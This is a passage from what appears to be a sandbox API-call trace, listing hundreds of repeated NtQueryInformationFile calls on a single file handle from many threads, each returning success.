FileInformation=0x210e20) returned 0x0 Thread: id = 2049 os_tid = 0x4fc [0166.358] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb58, FileInformation=0x210e20) returned 0x0 Thread: id = 2050 os_tid = 0x4dc [0166.360] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 2051 os_tid = 0x43c [0166.362] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd38, FileInformation=0x210e20) returned 0x0 Thread: id = 2052 os_tid = 0x1c4 [0166.364] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe18, FileInformation=0x210e20) returned 0x0 Thread: id = 2053 os_tid = 0xbec [0166.365] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df998, FileInformation=0x210e20) returned 0x0 Thread: id = 2054 os_tid = 0xb48 [0166.368] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df998, FileInformation=0x210e20) returned 0x0 Thread: id = 2055 os_tid = 0x5bc [0166.370] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfee8, FileInformation=0x210e20) returned 0x0 Thread: id = 2056 os_tid = 0x6b8 [0166.372] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f960, FileInformation=0x210e20) returned 0x0 Thread: id = 2057 os_tid = 0x2dc [0166.374] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fda8, FileInformation=0x210e20) returned 0x0 Thread: id = 2058 os_tid = 0x158 [0166.376] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df938, FileInformation=0x210e20) returned 0x0 Thread: id = 2059 os_tid = 0x6cc [0166.378] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa40, FileInformation=0x210e20) returned 0x0 Thread: id = 2060 os_tid = 0x694 [0166.380] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffda0, FileInformation=0x210e20) returned 0x0 Thread: id = 2061 os_tid = 0x6d8 [0166.382] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 2062 os_tid = 0x87c [0166.384] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb00, FileInformation=0x210e20) returned 0x0 Thread: id = 2063 os_tid = 0xb88 [0166.385] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f918, FileInformation=0x210e20) returned 0x0 Thread: id = 2064 os_tid = 0xb8c [0166.387] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 2065 os_tid = 0x700 [0166.393] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 2066 os_tid = 0x6f0 [0166.395] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 2067 os_tid = 0x130 [0166.397] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 2068 os_tid = 0x754 [0166.399] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc98, FileInformation=0x210e20) returned 0x0 Thread: id = 2069 os_tid = 0x72c [0166.401] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fad0, FileInformation=0x210e20) returned 0x0 Thread: id = 2070 os_tid = 0x748 [0166.403] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fae0, FileInformation=0x210e20) returned 0x0 Thread: id = 2071 os_tid = 0x928 [0166.405] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361faf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361faf8, FileInformation=0x210e20) returned 0x0 Thread: id = 2072 os_tid = 0xcc [0166.407] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df818, FileInformation=0x210e20) returned 0x0 Thread: id = 2073 os_tid = 0xd0 [0166.409] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f860, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f860, FileInformation=0x210e20) returned 0x0 Thread: id = 2074 os_tid = 0xd4 [0166.415] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 2075 os_tid = 0xd8 [0166.417] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7d0, FileInformation=0x210e20) returned 0x0 Thread: id = 2076 os_tid = 0xdc [0166.419] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc00, FileInformation=0x210e20) returned 0x0 Thread: id = 2077 os_tid = 0xe0 [0166.421] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7c0, FileInformation=0x210e20) returned 0x0 Thread: id = 2078 os_tid = 0xe4 [0166.423] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f890, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f890, FileInformation=0x210e20) returned 0x0 Thread: id = 2079 os_tid = 0xe8 [0166.426] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 2080 os_tid = 0xec [0166.428] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffb98, FileInformation=0x210e20) returned 0x0 Thread: id = 2081 os_tid = 0x9d8 [0166.430] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 2082 os_tid = 0x898 [0166.432] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe98, FileInformation=0x210e20) returned 0x0 Thread: id = 2083 os_tid = 0x48c [0166.434] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe38, FileInformation=0x210e20) returned 0x0 Thread: id = 2084 os_tid = 0x6a4 [0166.436] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f930, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f930, FileInformation=0x210e20) returned 0x0 Thread: id = 2085 os_tid = 0x20c [0166.438] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb28, FileInformation=0x210e20) returned 0x0 Thread: id = 2086 os_tid = 0x630 [0166.440] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 2087 os_tid = 0x5e4 [0166.442] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb40, FileInformation=0x210e20) returned 0x0 Thread: id = 2088 os_tid = 0xb28 [0166.444] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa10, FileInformation=0x210e20) returned 0x0 Thread: id = 2089 os_tid = 0xb20 [0166.446] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f838, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f838, FileInformation=0x210e20) returned 0x0 Thread: id = 2090 os_tid = 0x704 [0166.448] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfae8, FileInformation=0x210e20) returned 0x0 Thread: id = 2091 os_tid = 0x568 [0166.450] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 2092 os_tid = 0x5ac [0166.452] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 2093 os_tid = 0x908 [0166.454] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc60, FileInformation=0x210e20) returned 0x0 Thread: id = 2094 os_tid = 0x888 [0166.456] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfde8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfde8, FileInformation=0x210e20) returned 0x0 Thread: id = 2095 os_tid = 0x544 [0166.462] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb00, FileInformation=0x210e20) returned 0x0 Thread: id = 2096 os_tid = 0x76c [0166.464] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd38, FileInformation=0x210e20) returned 0x0 Thread: id = 2097 os_tid = 0xa9c [0166.466] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa50, FileInformation=0x210e20) returned 0x0 Thread: id = 2098 os_tid = 0x114 [0166.468] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f958, FileInformation=0x210e20) returned 0x0 Thread: id = 2099 os_tid = 0x5b8 [0166.470] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 2100 os_tid = 0x814 [0166.471] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff00, FileInformation=0x210e20) returned 0x0 Thread: id = 2101 os_tid = 0x834 [0166.474] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fab0, FileInformation=0x210e20) returned 0x0 Thread: id = 2102 os_tid = 0x884 [0166.475] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f910, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f910, FileInformation=0x210e20) returned 0x0 Thread: id = 2103 os_tid = 0x5d4 [0166.478] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb98, FileInformation=0x210e20) returned 0x0 Thread: id = 2104 os_tid = 0x340 [0166.480] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff970, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff970, FileInformation=0x210e20) returned 0x0 Thread: id = 2105 os_tid = 0x810 [0166.481] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 2106 os_tid = 0x830 [0166.483] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe60, FileInformation=0x210e20) returned 0x0 Thread: id = 2107 os_tid = 0x880 [0166.485] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df940, FileInformation=0x210e20) returned 0x0 Thread: id = 2108 os_tid = 0xae4 [0166.487] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375feb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375feb8, FileInformation=0x210e20) returned 0x0 Thread: id = 2109 os_tid = 0x570 [0166.489] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fb18, FileInformation=0x210e20) returned 0x0 Thread: id = 2110 os_tid = 0xb40 [0166.491] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 2111 os_tid = 0x5f4 [0166.493] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df860, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df860, FileInformation=0x210e20) returned 0x0 Thread: id = 2112 os_tid = 0xbb8 [0166.495] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f970, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f970, FileInformation=0x210e20) returned 0x0 Thread: id = 2113 os_tid = 0x598 [0166.497] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff58, FileInformation=0x210e20) returned 0x0 Thread: id = 2114 os_tid = 0x4e4 [0166.499] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd70, FileInformation=0x210e20) returned 0x0 Thread: id = 2115 os_tid = 0xbfc [0166.501] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7f8, FileInformation=0x210e20) returned 0x0 Thread: id = 2116 os_tid = 0x80c [0166.503] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 2117 os_tid = 0xbf8 [0166.505] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f950, FileInformation=0x210e20) returned 0x0 Thread: id = 2118 os_tid = 0x524 [0166.511] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa60, FileInformation=0x210e20) returned 0x0 Thread: id = 2119 os_tid = 0x674 [0166.513] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfec8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfec8, FileInformation=0x210e20) returned 0x0 Thread: id = 2120 os_tid = 0x4a0 [0166.515] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7f8, FileInformation=0x210e20) returned 0x0 Thread: id = 2121 os_tid = 0x5d8 [0166.517] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc00, FileInformation=0x210e20) returned 0x0 Thread: id = 2122 os_tid = 0x69c [0166.520] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd38, FileInformation=0x210e20) returned 0x0 Thread: id = 2123 os_tid = 0xb74 [0166.522] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd80, FileInformation=0x210e20) returned 0x0 Thread: id = 2124 os_tid = 0x6a8 [0166.524] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371faa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371faa8, FileInformation=0x210e20) returned 0x0 Thread: id = 2125 os_tid = 0xb68 [0166.526] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bff28, FileInformation=0x210e20) returned 0x0 Thread: id = 2126 os_tid = 0x758 [0166.528] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb48, FileInformation=0x210e20) returned 0x0 Thread: id = 2127 os_tid = 0x3d4 [0166.530] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 2128 os_tid = 0x484 [0166.532] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff50, FileInformation=0x210e20) returned 0x0 Thread: id = 2129 os_tid = 0xb4c [0166.535] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8e0, FileInformation=0x210e20) returned 0x0 Thread: id = 2130 os_tid = 0xa1c [0166.537] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb10, FileInformation=0x210e20) returned 0x0 Thread: id = 2131 os_tid = 0x2ac [0166.539] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 2132 os_tid = 0xa8c [0166.541] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc00, FileInformation=0x210e20) returned 0x0 Thread: id = 2133 os_tid = 0x68c [0166.543] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff18, FileInformation=0x210e20) returned 0x0 Thread: id = 2134 os_tid = 0x388 [0166.545] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa88, FileInformation=0x210e20) returned 0x0 Thread: id = 2135 os_tid = 0xa50 [0166.547] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff28, FileInformation=0x210e20) returned 0x0 Thread: id = 2136 os_tid = 0x75c [0166.549] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe48, FileInformation=0x210e20) returned 0x0 Thread: id = 2137 os_tid = 0x240 [0166.551] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 2138 os_tid = 0x320 [0166.553] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fee8, FileInformation=0x210e20) returned 0x0 Thread: id = 2139 os_tid = 0x3b4 [0166.555] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f988, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f988, FileInformation=0x210e20) returned 0x0 Thread: id = 2140 os_tid = 0x760 [0166.557] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc40, FileInformation=0x210e20) returned 0x0 Thread: id = 2141 os_tid = 0xb00 [0166.559] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf8e0, FileInformation=0x210e20) returned 0x0 Thread: id = 2142 os_tid = 0x7fc [0166.561] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df868, FileInformation=0x210e20) returned 0x0 Thread: id = 2143 os_tid = 0xb18 [0166.563] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb88, FileInformation=0x210e20) returned 0x0 Thread: id = 2144 os_tid = 0xa68 [0166.565] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc68, FileInformation=0x210e20) returned 0x0 Thread: id = 2145 os_tid = 0x224 [0166.567] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc78, FileInformation=0x210e20) returned 0x0 Thread: id = 2146 os_tid = 0x2c4 [0166.569] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 2147 os_tid = 0x24c [0166.570] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fcf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fcf0, FileInformation=0x210e20) returned 0x0 Thread: id = 2148 os_tid = 0x4e8 [0166.572] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff60, FileInformation=0x210e20) returned 0x0 Thread: id = 2149 os_tid = 0x220 [0166.574] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 2150 os_tid = 0xb04 [0166.576] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 2151 os_tid = 0x180 [0166.578] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc50, FileInformation=0x210e20) returned 0x0 Thread: id = 2152 os_tid = 0x53c [0166.580] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fe18, FileInformation=0x210e20) returned 0x0 Thread: id = 2153 os_tid = 0x5b4 [0166.582] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fed0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fed0, FileInformation=0x210e20) returned 0x0 Thread: id = 2154 os_tid = 0x614 [0166.584] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f790, FileInformation=0x210e20) returned 0x0 Thread: id = 2155 os_tid = 0x690 [0166.596] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f890, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f890, FileInformation=0x210e20) returned 0x0 Thread: id = 2156 os_tid = 0x440 [0166.598] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd78, FileInformation=0x210e20) returned 0x0 Thread: id = 2157 os_tid = 0x7d8 [0166.600] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc48, FileInformation=0x210e20) returned 0x0 Thread: id = 2158 os_tid = 0xa60 [0166.602] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f970, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f970, 